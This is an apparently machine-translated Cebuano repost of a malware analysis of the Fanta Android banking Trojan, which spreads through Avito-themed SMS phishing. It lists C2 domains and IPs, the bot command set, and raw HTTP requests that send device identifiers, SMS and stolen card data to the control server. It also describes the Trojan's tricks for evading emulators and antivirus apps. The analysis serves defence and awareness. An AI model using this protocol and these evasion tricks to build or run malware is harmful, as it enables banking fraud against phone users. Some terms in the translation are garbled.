ProHoster > Блог > balita sa internet > Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan

Usa ka adlaw gusto nimong ibaligya ang usa ka butang sa Avito ug, pagkahuman nagbutang usa ka detalyado nga paghulagway sa imong produkto (pananglitan, usa ka module sa RAM), madawat nimo kini nga mensahe:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android TrojanSa higayon nga imong ablihan ang link, imong makita ang usa ka daw dili makadaot nga panid nga nagpahibalo kanimo, ang malipayon ug malampuson nga magbabaligya, nga ang usa ka pagpalit gihimo:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
Sa higayon nga imong i-klik ang "Padayon" nga buton, usa ka APK file nga adunay usa ka icon ug usa ka ngalan nga makapadasig sa pagsalig ang ma-download sa imong Android device. Nag-instalar ka og aplikasyon nga sa pipila ka rason nangayo og mga katungod sa AccessibilityService, unya mitungha ang duha ka bintana ug daling nawala ug... Mao na.

Moadto ka aron susihon ang imong balanse, apan sa pipila ka hinungdan ang imong banking app nangayo usab sa mga detalye sa imong kard. Pagkahuman sa pagsulod sa datos, adunay usa ka makalilisang nga mahitabo: sa usa ka hinungdan nga dili pa klaro kanimo, ang salapi nagsugod sa pagkawala sa imong account. Gisulayan nimo nga sulbaron ang problema, apan ang imong telepono mosukol: gipugos niini ang "Balik" ug "Balay" nga mga yawe, dili mapalong ug dili motugot kanimo nga ma-aktibo ang bisan unsang mga lakang sa seguridad. Ingon usa ka sangputanan, gibiyaan ka nga wala’y kuwarta, wala mapalit ang imong mga butang, naglibog ka ug nahibulong: unsa ang nahitabo?

Ang tubag yano ra: nahimo kang biktima sa Android Trojan Fanta, usa ka miyembro sa pamilyang Flexnet. Giunsa kini nahitabo? Atong ipasabot karon.

Mga tagsulat: Andrey Polovinkin, junior nga espesyalista sa pagtuki sa malware, Ivan Pisarev, espesyalista sa pagtuki sa malware.

Pila ka istatistika

Ang Flexnet nga pamilya sa Android Trojans unang nailhan balik sa 2015. Sulod sa usa ka medyo taas nga panahon sa kalihokan, ang pamilya gipalapdan sa daghang mga subspecies: Fanta, Limebot, Lipton, ug uban pa. Ang Trojan, ingon man ang mga imprastraktura nga may kalabutan niini, wala mohunong: bag-ong epektibo nga mga laraw sa pag-apod-apod ang gihimo - sa among kaso, taas nga kalidad nga mga panid sa phishing nga gitumong sa usa ka piho nga tigbaligya sa tiggamit, ug ang mga nag-develop sa Trojan nagsunod sa mga uso sa uso sa. pagsulat sa virus - pagdugang bag-ong kagamitan nga nagpaposible sa pagkawat nga labi ka episyente nga salapi gikan sa mga nataptan nga aparato ug mga mekanismo sa pagpanalipod sa bypass.

Ang kampanya nga gihulagway niini nga artikulo gitumong sa mga tiggamit gikan sa Russia; usa ka gamay nga gidaghanon sa mga nataptan nga mga himan ang natala sa Ukraine, ug mas gamay pa sa Kazakhstan ug Belarus.

Bisan kung ang Flexnet naa sa arena sa Android Trojan sa sobra sa 4 ka tuig na karon ug gitun-an sa detalye sa daghang mga tigdukiduki, maayo gihapon kini nga porma. Sugod sa Enero 2019, ang potensyal nga kantidad sa kadaot labaw pa sa 35 milyon nga rubles - ug kini alang lamang sa mga kampanya sa Russia. Sa 2015, lain-laing mga bersyon niini nga Android Trojan gibaligya sa underground forums, diin ang source code sa Trojan uban sa usa ka detalyado nga paghulagway makita usab. Kini nagpasabot nga ang mga estadistika sa kadaot sa kalibutan mas makapahingangha. Dili usa ka dili maayo nga timailhan alang sa ingon nga tigulang nga tawo, dili ba?

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan

Gikan sa pagbaligya ngadto sa pagpangilad

Sama sa makita gikan sa gipresentar kaniadto nga screenshot sa usa ka panid sa phishing alang sa serbisyo sa Internet alang sa pag-post sa mga ad nga Avito, giandam kini alang sa usa ka piho nga biktima. Dayag, ang mga tig-atake naggamit sa usa sa mga parser ni Avito, nga nagkuha sa numero sa telepono ug ngalan sa nagbaligya, ingon man ang paghulagway sa produkto. Human sa pagpalapad sa panid ug pag-andam sa APK file, ang biktima gipadala sa usa ka SMS uban sa iyang ngalan ug usa ka link sa usa ka panid sa phishing nga adunay usa ka paghulagway sa iyang produkto ug ang kantidad nga nadawat gikan sa "pagbaligya" sa produkto. Pinaagi sa pag-klik sa buton, ang user makadawat og malisyoso nga APK file - Fanta.

Ang usa ka pagtuon sa shcet491[.]ru domain nagpakita nga kini gitugyan ngadto sa Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Ang file sa domain zone adunay mga entry nga nagpunting sa mga IP address 31.220.23[.]236, 31.220.23[.]243, ug 31.220.23[.]235. Apan, ang nag-unang resource record sa domain (Usa ka rekord) nagpunting sa server nga adunay IP address 178.132.1[.]240.

Ang IP address 178.132.1[.]240 nahimutang sa Netherlands ug sakop sa hoster. WorldStream. Ang mga IP address 31.220.23[.]235, 31.220.23[.]236 ug 31.220.23[.]243 nahimutang sa UK ug nahisakop sa shared hosting server HOSTINGER. Gigamit ingon usa ka recorder openprov-ru. Ang mosunod nga mga dominyo nasulbad usab sa IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Kinahanglang hinumdoman nga ang mga link sa mosunod nga pormat anaa sa halos tanang domain:

http://(www.){0,1}<%domain%>/[0-9]{7}

Kini nga template naglakip usab sa usa ka link gikan sa usa ka SMS nga mensahe. Base sa makasaysayan nga datos, nasuta nga ang usa ka domain katumbas sa daghang mga link sa pattern nga gihulagway sa ibabaw, nga nagpakita nga usa ka domain ang gigamit sa pag-apod-apod sa Trojan ngadto sa daghang mga biktima.

Ambak sa unahan gamay: ang Trojan nga gi-download pinaagi sa usa ka link gikan sa usa ka SMS naggamit sa adres ingon usa ka control server onusedseddohap[.]club. Kini nga domain narehistro sa 2019-03-12, ug sugod sa 2019-04-29, ang mga aplikasyon sa APK nakig-interact sa kini nga domain. Base sa datos nga nakuha gikan sa VirusTotal, total nga 109 ka mga aplikasyon ang nakig-interact niini nga server. Ang domain mismo ang nakasulbad sa IP address 217.23.14[.]27, nga nahimutang sa Netherlands ug gipanag-iya sa host WorldStream. Gigamit ingon usa ka recorder namecheap. Nasulbad usab ang mga domain niini nga IP address bad-racoon [.] club (sugod sa 2018-09-25) ug bad-racoon[.]live (sugod sa 2018-10-25). Uban sa domain bad-racoon [.] club labaw pa sa 80 APK nga mga file ang nakig-uban bad-racoon[.]live - labaw pa sa 100.

Sa kinatibuk-an, ang pag-atake nagpadayon sama sa mosunod:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan

Unsa ang naa sa ilawom sa taklob ni Fanta?

Sama sa daghang uban pang mga Android Trojans, ang Fanta makahimo sa pagbasa ug pagpadala sa mga mensahe sa SMS, paghimo sa mga hangyo sa USSD, ug pagpakita sa kaugalingon nga mga bintana sa ibabaw sa mga aplikasyon (lakip ang mga banking). Bisan pa, ang arsenal sa pagpaandar sa kini nga pamilya miabot na: Ang Fanta nagsugod sa paggamit AccessibilityService alang sa lainlaing mga katuyoan: pagbasa sa sulud sa mga pahibalo gikan sa ubang mga aplikasyon, pagpugong sa pag-ila ug paghunong sa pagpatay sa usa ka Trojan sa usa ka nataptan nga aparato, ug uban pa. Ang Fanta nagtrabaho sa tanan nga mga bersyon sa Android nga dili mas bata sa 4.4. Niini nga artikulo atong susihon pag-ayo ang mosunod nga sample sa Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Diha-diha dayon human sa paglansad

Diha-diha dayon human sa paglansad, ang Trojan nagtago sa iyang icon. Ang aplikasyon mahimo ra molihok kung ang ngalan sa nataptan nga aparato wala sa lista:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(labaha)

Kini nga pagsusi gihimo sa panguna nga serbisyo sa Trojan - Panguna nga Serbisyo. Kung gilansad sa unang higayon, ang mga parameter sa pagsumpo sa aplikasyon gisugdan sa mga default nga kantidad (ang format alang sa pagtipig sa data sa pagsumpo ug ang kahulugan niini hisgutan sa ulahi), ug usa ka bag-ong nataptan nga aparato ang narehistro sa control server. Usa ka HTTP POST nga hangyo nga adunay tipo sa mensahe ipadala sa server register_bot ug impormasyon bahin sa nataptan nga device (bersyon sa Android, IMEI, numero sa telepono, ngalan sa operator ug code sa nasod diin narehistro ang operator). Ang adres nagsilbing control server hXXp://onuseseddohap[.]club/controller.php. Agig tubag, ang server nagpadala usa ka mensahe nga adunay sulud bot_id, bot_pwd, server - gitipigan sa aplikasyon kini nga mga kantidad ingon mga parameter sa server sa CnC. Parameter server opsyonal kon ang field wala madawat: Fanta naggamit sa registration address - hXXp://onuseseddohap[.]club/controller.php. Ang function sa pag-usab sa CnC address mahimong magamit sa pagsulbad sa duha ka mga problema: sa pag-apod-apod sa load parehason tali sa pipila ka mga server (kon adunay usa ka dako nga gidaghanon sa mga nataptan nga mga himan, ang load sa usa ka unoptimized web server mahimong taas), ug usab sa paggamit usa ka alternatibong server kung mapakyas ang usa sa mga server sa CnC.

Kung adunay usa ka sayup nga mahitabo samtang nagpadala sa hangyo, ang Trojan magsubli sa proseso sa pagrehistro pagkahuman sa 20 segundos.

Kung ang aparato malampuson nga narehistro, ang Fanta magpakita sa mosunud nga mensahe sa tiggamit:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
Importante nga nota: ang serbisyo nga gitawag Kasiguruhan sa sistema — ang ngalan sa serbisyo sa Trojan, ug pagkahuman sa pag-klik sa buton OK Magaabli ang usa ka bintana nga adunay mga setting sa Accessibility sa nataptan nga device, diin ang user kinahanglang mohatag og mga katungod sa Accessibility alang sa malisyoso nga serbisyo:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
Sa diha nga ang user mo-on AccessibilityService, Ang Fanta nakaangkon og access sa mga sulod sa application windows ug sa mga aksyon nga gihimo niini:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
Diha-diha dayon human makadawat sa mga katungod sa Accessibility, ang Trojan nangayo og mga katungod sa tagdumala ug mga katungod sa pagbasa sa mga pahibalo:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
Gamit ang AccessibilityService, ang aplikasyon nagsundog sa mga keystroke, sa ingon naghatag sa iyang kaugalingon sa tanang gikinahanglang katungod.

Ang Fanta nagmugna og daghang mga database instances (nga ihulagway sa ulahi) nga gikinahanglan aron tipigan ang data sa configuration, ingon man ang impormasyon nga nakolekta sa proseso mahitungod sa nataptan nga device. Aron ipadala ang nakolekta nga impormasyon, ang Trojan nagmugna og balik-balik nga buluhaton nga gidesinyo sa pag-download sa mga field gikan sa database ug makadawat og command gikan sa control server. Ang agwat sa pag-access sa CnC gitakda depende sa bersyon sa Android: sa kaso sa 5.1, ang agwat mahimong 10 segundos, kung dili 60 segundos.

Aron makadawat sa sugo, si Fanta mihangyo GetTask ngadto sa management server. Agig tubag, ang CnC makapadala sa usa sa mosunod nga mga sugo:

team paghulagway
0 Ipadala ang mensahe sa SMS
1 Paghimo og tawag sa telepono o USSD command
2 Nag-update sa usa ka parameter agianan
3 Nag-update sa usa ka parameter pagsalipod
6 Nag-update sa usa ka parameter smsManager
9 Pagsugod sa pagkolekta sa mga mensahe sa SMS
11 I-reset ang imong telepono sa mga setting sa pabrika
12 I-enable/Disable ang pag-log sa paghimo sa dialog box

Gikolekta usab ni Fanta ang mga pahibalo gikan sa 70 nga mga aplikasyon sa bangko, mga sistema sa paspas nga pagbayad ug mga e-wallet ug gitipigan kini sa usa ka database.

Pagtipig sa mga parameter sa pag-configure

Aron matipigan ang mga parameter sa pagsumpo, ang Fanta naggamit usa ka sumbanan nga pamaagi alang sa platform sa Android - Gusto Nimo nga Setting- mga file. Ang mga setting ma-save sa usa ka file nga ginganlan setting. Ang usa ka paghulagway sa gitipigan nga mga parameter anaa sa lamesa sa ubos.

ngalan Default nga bili Posibleng mga bili paghulagway
id 0 Integer Bot ID
server hXXp://onuseseddohap[.]club/ URL Kontrolaha ang adres sa server
pwd - hilo Password sa server
agianan 20 Integer Gintang sa oras. Nagpakita kung unsa kadugay ang mga musunod nga mga buluhaton kinahanglan nga malangan:

  • Kung nagpadala usa ka hangyo bahin sa kahimtang sa gipadala nga mensahe sa SMS
  • Pagdawat og bag-ong sugo gikan sa management server
pagsalipod sa tanan nga mga tanan/telNumber Kung ang uma parehas sa hilo sa tanan nga mga o telNumber, unya ang nadawat nga mensahe sa SMS ma-intercept sa aplikasyon ug dili ipakita sa tiggamit
smsManager 0 0/1 I-enable/disable ang aplikasyon isip default SMS recipient
readDialog bakak nga mga Tinuod/bakak I-enable/Disable ang pag-log sa panghitabo AccessibilityEvent

Gigamit usab ni Fanta ang file smsManager:

ngalan Default nga bili Posibleng mga bili paghulagway
pckg - hilo Ngalan sa SMS message manager nga gigamit

Interaksyon sa mga database

Atol sa operasyon niini, ang Trojan naggamit sa duha ka mga database. Ginganlan sa database a gigamit sa pagtipig sa lainlaing impormasyon nga nakolekta gikan sa telepono. Ang ikaduha nga database ginganlan fanta.db ug gigamit sa pagtipig sa mga setting nga responsable sa paghimo sa mga bintana sa phishing nga gidisenyo aron makolekta ang kasayuran bahin sa mga kard sa bangko.

Ang Trojan naggamit sa database а sa pagtipig sa nakolekta nga impormasyon ug pag-log sa imong mga aksyon. Ang datos gitipigan sa usa ka lamesa mga troso. Aron makahimo og lamesa, gamita ang mosunod nga SQL query:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Ang database naglangkob sa mosunod nga impormasyon:

1. Pag-log sa pagsugod sa nataptan nga aparato gamit ang usa ka mensahe Naka-on ang telepono!

2. Mga pahibalo gikan sa mga aplikasyon. Ang mensahe gihimo sumala sa mosunod nga template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Data sa bank card gikan sa mga porma sa phishing nga gihimo sa Trojan. Parameter VIEW_NAME mahimong usa sa mosunod:

  • AliExpress
  • Avito
  • google Play
  • Lainlain <%Ngalan sa App%>

Ang mensahe gi-log sa format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages sa pormat:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Impormasyon mahitungod sa package nga nagmugna sa dialog box sa format:

(<%Package name%>)<%Package information%>

Ehemplo nga lamesa mga troso:

Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
Usa sa mga gamit sa Fanta mao ang pagkolekta sa impormasyon bahin sa mga bank card. Ang pagkolekta sa datos mahitabo pinaagi sa paghimo sa mga bintana sa phishing sa dihang magbukas sa mga aplikasyon sa banking. Ang Trojan nagmugna sa phishing window kausa ra. Ang impormasyon nga ang bintana gipakita sa user gitipigan sa usa ka lamesa setting sa database fanta.db. Aron makahimo og database, gamita ang mosunod nga SQL query:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Tanan nga mga talaan sa lamesa setting pinaagi sa default gisugdan sa 1 (paghimo og phishing window). Human ang user mosulod sa ilang data, ang bili itakda sa 0. Pananglitan sa mga field sa lamesa setting:

  • maka-login — ang uma ang responsable sa pagpakita sa porma sa pagbukas sa aplikasyon sa banking
  • first_bank - wala gigamit
  • can_avito — ang uma ang responsable sa pagpakita sa porma sa pag-abli sa aplikasyon sa Avito
  • mahimo_ali — ang uma ang responsable sa pagpakita sa porma kung giablihan ang aplikasyon sa Aliexpress
  • mahimo_sa lain — ang uma ang responsable sa pagpakita sa porma kung magbukas sa bisan unsang aplikasyon gikan sa lista: Yula, Pandao, Drom Auto, Wallet. Diskwento ug bonus nga mga kard, Aviasales, Booking, Trivago
  • can_card — ang uma ang responsable sa pagpakita sa porma sa pagbukas google Play

Interaksyon sa server sa pagdumala

Ang interaksyon sa network sa management server mahitabo pinaagi sa HTTP protocol. Aron magtrabaho kauban ang network, gigamit ni Fanta ang sikat nga librarya sa Retrofit. Ang mga hangyo ipadala sa: hXXp://onuseseddohap[.]club/controller.php. Ang adres sa server mahimong usbon kung magparehistro sa server. Ang mga cookies mahimong ipadala isip tubag gikan sa server. Gihimo sa Fanta ang mosunod nga mga hangyo sa server:

  • Ang pagrehistro sa bot sa control server mahitabo kausa, sa unang paglansad. Ang mosunud nga datos bahin sa nataptan nga aparato gipadala sa server:
    · cookie — cookies nga nadawat gikan sa server (default nga bili kay walay sulod nga string)
    · mode - kanunay nga hilo register_bot
    · unahan - integer kanunay 2
    · version_sdk - naporma sumala sa mosunod nga template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI sa nataptan nga aparato
    · nasud — code sa nasud diin narehistro ang operator, sa format nga ISO
    · gidaghanon - numero sa telepono
    · operator - ngalan sa operator

    Usa ka pananglitan sa usa ka hangyo nga gipadala sa server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Agig tubag sa hangyo, kinahanglan nga ibalik sa server ang usa ka butang nga JSON nga adunay sulud nga mosunud nga mga parameter:
    · bot_id - ID sa nataptan nga aparato. Kung ang bot_id katumbas sa 0, ipatuman pag-usab ni Fanta ang hangyo.
    bot_pwd - password alang sa server.
    server - pagkontrol sa adres sa server. Opsyonal nga parameter. Kung ang parameter wala gitino, ang adres nga gitipigan sa aplikasyon gamiton.

    Pananglitan nga JSON object:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Paghangyo nga makadawat usa ka mando gikan sa server. Ang mosunod nga datos gipadala sa server:
    · cookie — cookies nga nadawat gikan sa server
    · bid - id sa nataptan nga aparato nga nadawat sa pagpadala sa hangyo register_bot
    · pwd — password alang sa server
    · divice_admin — ang natad nagtino kung nakuha ba ang mga katungod sa tagdumala. Kung nakuha ang mga katungod sa tagdumala, ang field katumbas sa 1, kon dili 0
    · Accessibility — Status sa operasyon sa Serbisyo sa Pag-access. Kung gisugdan ang serbisyo, ang kantidad mao 1, kon dili 0
    · SMSManager — nagpakita kung ang Trojan gipagana ingon ang default nga aplikasyon alang sa pagdawat sa SMS
    · screen - nagpakita kung unsa ang kahimtang sa screen. Ang bili itakda 1, kon ang screen anaa, kon dili 0;

    Usa ka pananglitan sa usa ka hangyo nga gipadala sa server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depende sa sugo, ang server makabalik sa JSON nga butang nga adunay lain-laing mga parameter:

    · team Ipadala ang mensahe sa SMS: Ang mga parameter naglangkob sa numero sa telepono, ang teksto sa SMS nga mensahe ug ang ID sa mensahe nga gipadala. Ang identifier gigamit kung magpadala usa ka mensahe sa server nga adunay tipo setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · team Paghimo og tawag sa telepono o USSD command: Ang numero sa telepono o sugo anaa sa tubag nga lawas. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · team Usba ang parameter sa interval. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · team Usba ang parameter sa intercept. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · team Usba ang field sa SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · team Pagkolekta mga mensahe sa SMS gikan sa usa ka nataptan nga aparato.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · team I-reset ang imong telepono sa mga setting sa pabrika: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · team Usba ang ReadDialog parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Pagpadala usa ka mensahe nga adunay tipo setSmsStatus. Kini nga hangyo gihimo human mapatuman ang sugo Ipadala ang mensahe sa SMS. Ang hangyo ingon niini:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Pag-upload sa mga sulud sa database. Usa ka laray ang gipasa kada hangyo. Ang mosunod nga datos gipadala sa server:
    · cookie — cookies nga nadawat gikan sa server
    · mode - kanunay nga hilo setSaveInboxSms
    · bid - id sa nataptan nga aparato nga nadawat sa pagpadala sa hangyo register_bot
    · teksto — teksto sa kasamtangan nga rekord sa database (field d gikan sa lamesa mga troso sa database а)
    · gidaghanon — ngalan sa karon nga rekord sa database (field p gikan sa lamesa mga troso sa database а)
    · sms_mode — integer nga kantidad (field m gikan sa lamesa mga troso sa database а)

    Ang hangyo ingon niini:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Kung malampuson nga ipadala sa server, ang laray mapapas gikan sa lamesa. Pananglitan sa usa ka JSON nga butang nga gibalik sa server:

    {
    "response":[],
    "status":"ok"
}

Pag-interact sa AccessibilityService

Gipatuman ang AccessibilityService aron mas dali gamiton ang mga Android device alang sa mga tawo nga adunay mga kakulangan. Sa kadaghanan nga mga kaso, gikinahanglan ang pisikal nga interaksyon aron makig-uban sa usa ka aplikasyon. Gitugotan ka sa AccessibilityService nga buhaton kini sa programmatically. Gigamit sa Fanta ang serbisyo aron makahimo og peke nga mga bintana sa mga aplikasyon sa pagbabangko ug mapugngan ang mga tiggamit sa pag-abli sa mga setting sa sistema ug pipila ka mga aplikasyon.

Gamit ang gamit sa AccessibilityService, gimonitor sa Trojan ang mga kausaban sa mga elemento sa screen sa nataptan nga device. Sama sa gihulagway kaniadto, ang mga setting sa Fanta adunay usa ka parameter nga responsable sa mga operasyon sa pag-log nga adunay mga kahon sa dialogo - readDialog. Kung kini nga parameter gitakda, ang kasayuran bahin sa ngalan ug paghulagway sa package nga nag-trigger sa panghitabo idugang sa database. Ang Trojan naghimo sa mosunod nga mga aksyon kung ang mga panghitabo ma-trigger:

  • Nag-simulate sa pagpindot sa likod ug mga yawe sa balay sa mosunod nga mga kaso:
    · kung gusto sa user nga i-reboot ang iyang device
    · kung gusto sa user nga papason ang "Avito" nga aplikasyon o usbon ang mga katungod sa pag-access
    · kung adunay paghisgot sa "Avito" nga aplikasyon sa panid
    · sa pag-abli sa Google Play Protect nga aplikasyon
    · sa pagbukas sa mga panid nga adunay mga setting sa AccessibilityService
    · sa diha nga ang System Security dialog box makita
    · sa pag-abli sa panid gamit ang “Draw over other app” settings
    · sa pag-abli sa "Aplikasyon" nga panid, "Pagbawi ug pag-reset", "Pag-reset sa datos", "Pag-reset sa mga setting", "Developer panel", "Espesyal. mga oportunidad", "Espesyal nga mga oportunidad", "Espesyal nga mga katungod"
    · kung ang panghitabo gihimo sa pipila ka mga aplikasyon.

    Listahan sa mga aplikasyon

    • android
    • Master Lite
    • Limpyo nga Agalon
    • Limpyo nga Agalon alang sa x86 CPU
    • Pagdumala sa Permiso sa Aplikasyon sa Meizu
    • Seguridad sa MIUI
    • Limpyo nga Agalon - Antivirus & Cache ug Panglimpyo sa Basura
    • Mga kontrol sa ginikanan ug GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock ug Web Security Beta
    • Panglimpyo sa Virus, Antivirus, Panglimpyo (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & libre nga proteksyon 2019
    • Mobile Security MegaFon
    • AVG Protection alang sa Xperia
    • Seguridad sa Mobile
    • Malwarebytes antivirus ug proteksyon
    • Antivirus alang sa Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus alang sa Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed ​​Booster
    • Si Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus ug Security sa Mobile
    • Kaspersky Internet Security: Antivirus ug Proteksyon
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - proteksyon ug pagdumala
    • AVG Antivirus libre 2019 - Panalipod alang sa Android
    • Antivirus Android
    • Norton Mobile Security ug Antivirus
    • Antivirus, firewall, VPN, seguridad sa mobile
    • Seguridad sa Mobile: antivirus, VPN, proteksyon sa pagpangawat
    • Antivirus alang sa Android

  • Kung gihangyo ang pagtugot kung magpadala usa ka mensahe sa SMS sa usa ka mubo nga numero, gi-simulate sa Fanta ang pag-klik sa checkbox Hinumdomi ang pagpili ug butones nga ipadala.
  • Kung gisulayan nimo nga kuhaon ang mga katungod sa tagdumala gikan sa Trojan, gi-lock niini ang screen sa telepono.
  • Gipugngan ang pagdugang og bag-ong mga tigdumala.
  • Kung ang antivirus nga aplikasyon dr.web nakamatikod og hulga, gisundog ni Fanta ang pagpindot sa buton ibaliwala.
  • Ang Trojan nag-simulate sa pagpindot sa back ug home button kung ang panghitabo gihimo sa aplikasyon Pag-atiman sa Samsung Device.
  • Ang Fanta nagmugna og mga bintana sa phishing nga adunay mga porma alang sa pagsulod sa impormasyon bahin sa mga bank card kung ang usa ka aplikasyon gikan sa usa ka lista nga naglakip sa mga 30 ka lain-laing mga serbisyo sa Internet gilunsad. Lakip kanila: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ug uban pa.

    Mga porma sa phishing

    Gisusi sa Fanta kung unsang mga aplikasyon ang nagdagan sa nataptan nga aparato. Kung giablihan ang usa ka aplikasyon sa interes, ang Trojan nagpakita sa usa ka bintana sa phishing sa ibabaw sa tanan nga uban pa, nga usa ka porma sa pagsulod sa impormasyon sa bank card. Ang user kinahanglang mosulod sa mosunod nga datos:

    • Numero sa card
    • Petsa sa pag-expire sa card
    • CVV
    • Ngalan sa cardholder (dili para sa tanang bangko)

    Depende sa nagdagan nga aplikasyon, lainlain nga mga bintana sa phishing ang ipakita. Sa ubos mao ang mga pananglitan sa pipila niini:

    AliExpress:

    Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
    Avito:

    Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan
    Alang sa ubang mga aplikasyon, e.g. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: usa ka bag-ong taktika alang sa daan nga Android Trojan

    Naunsa gyud

    Maayo na lang, ang tawo nga nakadawat sa mensahe sa SMS nga gihulagway sa sinugdanan sa artikulo nahimo nga usa ka espesyalista sa cybersecurity. Busa, ang tinuod, dili-direktor nga bersyon lahi sa usa nga gisulti sa sayo pa: ang usa ka tawo nakadawat usa ka makapaikag nga SMS, pagkahuman gihatag niya kini sa Grupo-IB Threat Hunting Intelligence team. Ang resulta sa pag-atake mao kini nga artikulo. Happy ending diba? Bisan pa, dili tanan nga mga istorya natapos nga malampuson, ug aron ang imoha dili ingon usa ka cut sa direktor nga adunay pagkawala sa salapi, sa kadaghanan nga mga kaso igo na nga sundon ang mga mosunod nga dugay nang gihulagway nga mga lagda:

    • ayaw i-install ang mga aplikasyon alang sa usa ka mobile device nga adunay Android OS gikan sa bisan unsang gigikanan gawas sa Google Play
    • Sa pag-instalar sa usa ka aplikasyon, paghatag ug espesyal nga pagtagad sa mga katungod nga gipangayo sa aplikasyon
    • pagtagad sa mga extension sa na-download nga mga file
    • i-install kanunay ang mga update sa Android OS
    • ayaw pagbisita sa mga kadudahang kapanguhaan ug ayaw pag-download sa mga file gikan didto
    • Ayaw pag-klik sa mga link nga nadawat sa mga mensahe sa SMS.

Source: www.habr.com

Idugang sa usa ka comment